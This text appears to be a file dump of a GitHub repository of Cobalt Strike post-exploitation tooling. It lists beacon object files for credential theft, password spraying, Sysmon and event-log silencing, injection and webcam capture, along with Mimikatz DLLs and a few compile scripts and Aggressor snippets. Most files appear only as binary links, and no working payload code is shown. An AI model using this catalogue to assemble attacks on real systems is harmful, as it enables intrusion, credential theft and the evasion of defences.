https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/IdleTime/idletime.o -------------------------------------------------------------------------------- /Cobatl Strike/LoadLib/loadlib.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/LoadLib/loadlib.o -------------------------------------------------------------------------------- /Cobatl Strike/PSremote/psremote.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/PSremote/psremote.o -------------------------------------------------------------------------------- /Loader/COFF Loader/BOF/test64.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/COFF Loader/BOF/test64.out 
-------------------------------------------------------------------------------- /Cobatl Strike/BOF CredUI/prompt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF CredUI/prompt.png -------------------------------------------------------------------------------- /Cobatl Strike/EnumFiles/enumfiles.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumFiles/enumfiles.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumLib/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumlib.c 4 | move /y enumlib.obj enumlib.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/ForceLockScreen/forcelockscreen.h: -------------------------------------------------------------------------------- 1 | #include 2 | //Main 3 | DECLSPEC_IMPORT BOOL WINAPI USER32$LockWorkStation(void); -------------------------------------------------------------------------------- /Community KIT/css/imgs/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Community KIT/css/imgs/favicon.ico -------------------------------------------------------------------------------- /Loader/BOF Loader/whoami.x64.o.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/BOF Loader/whoami.x64.o.i64 -------------------------------------------------------------------------------- /Cobatl Strike/BOF CredUI/command.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF CredUI/command.png -------------------------------------------------------------------------------- /Cobatl Strike/BOF CredUI/credui.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF CredUI/credui.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/BOF CredUI/credui.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF CredUI/credui.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/BOF DLL Inject/inject.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF DLL Inject/inject.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/Shellcode.h: -------------------------------------------------------------------------------- 1 | unsigned char shellcode[] = { 2 | }; 3 | unsigned int len = 798; 4 | -------------------------------------------------------------------------------- /Cobatl Strike/CredPrompt/credprompt.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CredPrompt/credprompt.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumDotnet/enumdotnet.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumDotnet/enumdotnet.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumDrives/enumdrives.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumDrives/enumdrives.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumShares/enumshares.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumShares/enumshares.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumSysmon/enumsysmon.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumSysmon/enumsysmon.o -------------------------------------------------------------------------------- /Cobatl Strike/SystemInfo/systeminfo.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/SystemInfo/systeminfo.o -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/entry.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/entry.x64.obj -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/beaconestablishednote.cna: 
-------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | bnote($1,"Established: " . formatDate('MM/dd/yyyy HH:mm:ss (z)')); 3 | } -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/dblt/wbe.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobalt Strike Win Exec/doc/dblt/wbe.deb -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/beaconestablishednote.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | bnote($1,"Established: " . formatDate('MM/dd/yyyy HH:mm:ss (z)')); 3 | } -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/say.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | if (-isadmin $1) { 3 | exec("say -v Fiona 'New admin beacon!'"); 4 | } 5 | } -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/beaconestablishednote.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | bnote($1,"Established: " . 
formatDate('MM/dd/yyyy HH:mm:ss (z)')); 3 | } -------------------------------------------------------------------------------- /Cobatl Strike/BOF DLL Inject/test32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF DLL Inject/test32.dll -------------------------------------------------------------------------------- /Cobatl Strike/BOF DLL Inject/test64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF DLL Inject/test64.dll -------------------------------------------------------------------------------- /Cobatl Strike/BOF SprayAD/SprayAD.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF SprayAD/SprayAD.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/BOF SprayAD/SprayAD.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF SprayAD/SprayAD.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor.exe -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/out.vir: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/out.vir 
-------------------------------------------------------------------------------- /Cobatl Strike/Elusive Mice/util/hash.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Elusive Mice/util/hash.exe -------------------------------------------------------------------------------- /Cobatl Strike/EnumDotnet/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumdotnet.c 4 | move /y enumdotnet.obj enumdotnet.o 5 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumFiles/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumfiles.c 4 | move /y enumfiles.obj enumfiles.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumHandles/enumhandles.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumHandles/enumhandles.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumWSC/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumwsc.c 4 | move /y enumwsc.obj enumwsc.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/Erebus/post/SharpShell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Erebus/post/SharpShell.exe 
-------------------------------------------------------------------------------- /Cobatl Strike/RDP Thief/RdpThief_x64.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/RDP Thief/RdpThief_x64.tmp -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/dblt/wbe.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobalt Strike Win Exec/cmake/dblt/wbe.deb -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/dblt/strike.asm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobalt Strike Win Exec/doc/dblt/strike.asm -------------------------------------------------------------------------------- /Cobatl Strike/Add User BOF/dist/iXY2823.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Add User BOF/dist/iXY2823.PNG -------------------------------------------------------------------------------- /Cobatl Strike/AddExclusion/addexclusion.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/AddExclusion/addexclusion.o -------------------------------------------------------------------------------- /Cobatl Strike/AddLocalCert/addlocalcert.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/AddLocalCert/addlocalcert.o 
-------------------------------------------------------------------------------- /Cobatl Strike/Aggrokatz/bof/fileread_x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Aggrokatz/bof/fileread_x64.o -------------------------------------------------------------------------------- /Cobatl Strike/BlindEventlog/blindeventlog.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BlindEventlog/blindeventlog.o -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP.cna: -------------------------------------------------------------------------------- 1 | alias dazzleUP { 2 | bdllspawn($1, script_resource("dazzleUP_Reflective_DLL.dll"), $2, "dazzleUP", 5000, false); 3 | } 4 | -------------------------------------------------------------------------------- /Cobatl Strike/DelExclusion/delexclusion.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DelExclusion/delexclusion.o -------------------------------------------------------------------------------- /Cobatl Strike/DelLocalCert/dellocalcert.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DelLocalCert/dellocalcert.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumDrives/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumdrives.c 4 | move /y enumdrives.obj enumdrives.o 5 | 6 | 
-------------------------------------------------------------------------------- /Cobatl Strike/EnumHandles/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumhandles.c 4 | move /y enumhandles.obj enumhandles.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumLocalCert/enumlocalcert.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumLocalCert/enumlocalcert.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumSysmon/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumsysmon.c 4 | move /y enumsysmon.obj enumsysmon.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumWebClient/enumwebclient.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumWebClient/enumwebclient.o -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/test/Resource.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/test/Resource.rc -------------------------------------------------------------------------------- /Cobatl Strike/IdleTime/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc idletime.c 4 | move /y idletime.obj idletime.o 5 | 6 | 7 | 
-------------------------------------------------------------------------------- /Cobatl Strike/PSremote/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc psremote.c 4 | move /y psremote.obj psremote.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/PasswordSpray/passwordspray.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/PasswordSpray/passwordspray.o -------------------------------------------------------------------------------- /Cobatl Strike/SilenceSysmon/silencesysmon.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/SilenceSysmon/silencesysmon.o -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/WebcamBOF.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/WebcamBOF.x64.obj -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/WebcamBOF.x86.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/WebcamBOF.x86.obj -------------------------------------------------------------------------------- /Cobatl Strike/WiFiPasswords/wifipasswords.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/WiFiPasswords/wifipasswords.o 
-------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-min.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz Kit/resources/mimikatz-min.x64.dll -------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-min.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz Kit/resources/mimikatz-min.x86.dll -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/dblt/strike.asm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobalt Strike Win Exec/cmake/dblt/strike.asm -------------------------------------------------------------------------------- /Cobatl Strike/CaptureNetNTLM/capturenetntlm.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CaptureNetNTLM/capturenetntlm.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike MoveKit/Aggressor/payloadGen.cna: -------------------------------------------------------------------------------- 1 | # 2 | # 3 | # MoveKit - Payload Generation 4 | # by: @0xthirteen 5 | # 6 | # 7 | # Not fully moved over yet -------------------------------------------------------------------------------- /Cobatl Strike/DelExclusion/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc delexclusion.c 4 | move /y delexclusion.obj 
delexclusion.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/DelLocalCert/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc dellocalcert.c 4 | move /y dellocalcert.obj dellocalcert.o 5 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumExclusions/enumexclusions.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumExclusions/enumexclusions.o -------------------------------------------------------------------------------- /Cobatl Strike/Spray AD/Spray-AD/Spray-AD.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Spray AD/Spray-AD/Spray-AD.dll -------------------------------------------------------------------------------- /Cobatl Strike/SystemInfo/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc systeminfo.c 4 | move /y systeminfo.obj systeminfo.o 5 | 6 | -------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-full.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz Kit/resources/mimikatz-full.x64.dll -------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-full.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz 
Kit/resources/mimikatz-full.x86.dll -------------------------------------------------------------------------------- /Cobatl Strike/AddExclusion/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc addexclusion.c 4 | move /y addexclusion.obj addexclusion.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/AddFirewallRule/addfirewallrule.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/AddFirewallRule/addfirewallrule.o -------------------------------------------------------------------------------- /Cobatl Strike/CredPrompt/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc credprompt.c 4 | move /y credprompt.obj credprompt.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/DelFirewallRule/delfirewallrule.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DelFirewallRule/delfirewallrule.o -------------------------------------------------------------------------------- /Cobatl Strike/DllComHijacking/dllcomhijacking.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DllComHijacking/dllcomhijacking.o -------------------------------------------------------------------------------- /Cobatl Strike/DllEnvHijacking/dllenvhijacking.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DllEnvHijacking/dllenvhijacking.o -------------------------------------------------------------------------------- /Cobatl Strike/Elusive Mice/bin/elusiveMice.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Elusive Mice/bin/elusiveMice.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Elusive Mice/bin/elusiveMice.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Elusive Mice/bin/elusiveMice.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumSecProducts/enumsecproducts.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumSecProducts/enumsecproducts.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumShares/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumshares.c 4 | move /y enumshares.obj enumshares.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/ForceLockScreen/forcelockscreen.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/ForceLockScreen/forcelockscreen.o -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/Resource.rc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/Resource.rc -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/bfmain.h: -------------------------------------------------------------------------------- 1 | #include "common.h" 2 | 3 | SECTION( A ) VOID WINAPI BofMain( _In_ PBAPI_TABLE BeaconApi, _In_ PVOID Argv, _In_ INT Argc ); 4 | -------------------------------------------------------------------------------- /Cobatl Strike/InjectPoolParty/injectpoolparty.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/InjectPoolParty/injectpoolparty.o -------------------------------------------------------------------------------- /Cobatl Strike/PasswordSpray/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc passwordspray.c 4 | move /y passwordspray.obj passwordspray.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/Portscan BOF/bin/pingscanner.bof.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Portscan BOF/bin/pingscanner.bof.o -------------------------------------------------------------------------------- /Cobatl Strike/Portscan BOF/bin/portscanner.bof.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Portscan BOF/bin/portscanner.bof.o -------------------------------------------------------------------------------- 
/Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.zip -------------------------------------------------------------------------------- /Cobatl Strike/WiFiPasswords/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc wifipasswords.c 4 | move /y wifipasswords.obj wifipasswords.o 5 | 6 | -------------------------------------------------------------------------------- /Loader/AceLdr/src/hooks/heap.c: -------------------------------------------------------------------------------- 1 | #include "hooks.h" 2 | 3 | SECTION( D ) HANDLE GetProcessHeap_Hook() 4 | { 5 | return ( ( PSTUB )OFFSET( Stub ) )->Heap; 6 | }; 7 | -------------------------------------------------------------------------------- /Loader/Cobalt Strike Crystal Kit/libtcg.x64.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/Cobalt Strike Crystal Kit/libtcg.x64.zip -------------------------------------------------------------------------------- /Loader/Cobalt Strike Crystal Kit/libtp.x64.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/Cobalt Strike Crystal Kit/libtp.x64.zip -------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-chrome.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz Kit/resources/mimikatz-chrome.x64.dll 
-------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-chrome.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz Kit/resources/mimikatz-chrome.x86.dll -------------------------------------------------------------------------------- /Cobatl Strike/Add User BOF/dist/AddUser-Bof.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Add User BOF/dist/AddUser-Bof.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Add User BOF/dist/AddUser-Bof.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Add User BOF/dist/AddUser-Bof.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/AddLocalCert/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc addlocalcert.c 4 | move /y addlocalcert.obj addlocalcert.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/AddTaskScheduler/addtaskscheduler.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/AddTaskScheduler/addtaskscheduler.o -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/loader.cna: -------------------------------------------------------------------------------- 1 | # Automatically loads all aggressor scripts. 
2 | # Idea taken from Und3rf10w 3 | 4 | include(script_resource("elevate/elevate.cna")); -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/alaris-console.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/alaris-console.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/alaris-options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/alaris-options.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/option-staged.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/option-staged.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/pezor-console.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/pezor-console.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/pezor-options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/pezor-options.png -------------------------------------------------------------------------------- /Cobatl Strike/BlindEventlog/bofcompile.bat: 
-------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | REM Compile-only build of blindeventlog.c: /c stops before linking, /Tc treats the file as C, /Od disables optimisation, /MT selects the static CRT, /W0 turns all warnings off and /GS- turns stack buffer security checks off; the .obj is then renamed to .o. NOTE(review): there is no errorlevel check between the two steps, so a failed compile can leave an older .o in place. 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc blindeventlog.c 4 | move /y blindeventlog.obj blindeventlog.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/DelFirewallRule/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | REM Compile-only build of delfirewallrule.c: /c stops before linking, /Tc treats the file as C, /Od disables optimisation, /MT selects the static CRT, /W0 turns all warnings off and /GS- turns stack buffer security checks off; the .obj is then renamed to .o. NOTE(review): there is no errorlevel check between the two steps, so a failed compile can leave an older .o in place. 3 | cl.exe /nologo /c /Od /MT 